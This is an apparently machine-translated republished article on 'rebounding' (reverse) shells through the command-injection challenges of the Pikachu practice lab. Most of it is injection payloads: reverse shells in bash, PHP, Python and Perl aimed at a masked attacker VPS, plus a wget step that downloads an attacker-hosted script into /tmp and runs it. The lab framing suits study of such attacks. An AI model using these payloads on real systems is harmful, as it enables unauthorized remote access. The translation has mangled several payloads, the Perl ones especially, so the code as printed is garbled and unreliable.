Shulou(Shulou.com)06/01 Report--

This article mainly explains "how to rebound shell". The content in the article is simple and clear, and it is easy to learn and understand. Please follow the editor's train of thought to study and learn "how to rebound shell".

Topic analysis: RCE of Pikachu

Whoami is www-data privilege, very low privilege

Pwd can view the current path and determine that it is a linux system

Ls-al looks at the read and write execution permissions under the current directory:

It can be seen that other users do not have high privileges and cannot write horses in the current directory without write execution permissions. After an attempt, bash failed to rebound shell.

Question 1: exec "ping"

Method 1: / tmp write bash bounce script execution

/ tmp has writeable executable permission, so write a bash rebound script:

127.0.0.1 | Echo 'bash-I > & / dev/tcp/47.107.x.xx/7777 0 > & 1' > / tmp/cdk.sh

Listen first on Vps, and then bash executes the script:

127.0.0.1 | bash / tmp/cdk.sh

Method 2: php bounces shell

Payload:

127.0.0.1 | php-r'$sock=fsockopen ("47.107.xx.xxx", 7777); exec ("/ bin/sh-I & 3 2 > & 3");'

Method 3: python bounce shell

Payload:

127.0.0.1 | python-c 'import socket,subprocess,os;s=socket.socket (socket.AF_INET,socket.SOCK_STREAM); s.connect (("47.107.xx.xx", 7777)); os.dup2 (s.fileno (), 0); os.dup2 (s.fileno (), 1); os.dup2 (s.fileno (), 2); p=subprocess.call (["/ bin/sh", "- I"]);'

Method 4: perl bounces shell

Payload1 (dependency / bin/sh):

127.0.0.1 | perl-e 'use Socket;$i= "47.107.xx.xx"; $pendant 7777th sockets (SGramPFpendet net, SOCKSTREAMReceiving getprotobyname ("tcp")); if (connect (sockaddrystin ($pdint inetyogaton ($I) {open (STDIN, "> & S"); open (STDOUT, "> & S"); open (STDERR, "> & S"); exec ("/ bin/sh-I");}';

Payload2 (independent of / bin/sh):

127.0.0.1 | perl-MIO-e'$pumped fork opportunity exitwriting if ($p); $c=new IO::Socket::INET (PeerAddr, "47.107.xx.xx:7777"); STDIN- > fdopen ($c _ r); $~-> fdopen ($c ~ w); system$_ while;'

Question 2: exec "eval"

The title is as follows:

Write a sh that bounces shell on your server and download it to the target server using wget to avoid format problems in the transmission process.

Enable http services with python.

Execute the command:

System ('wget-P / tmp/ http://180.76.xx.xx:8000/drinkwater.sh')

Execute the script and rebound the shell successfully:

System ("bash / tmp/drinkwater.sh")

Thank you for your reading, the above is the content of "how to rebound shell", after the study of this article, I believe you have a deeper understanding of how to rebound shell, and the specific use needs to be verified in practice. Here is, the editor will push for you more related knowledge points of the article, welcome to follow!

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.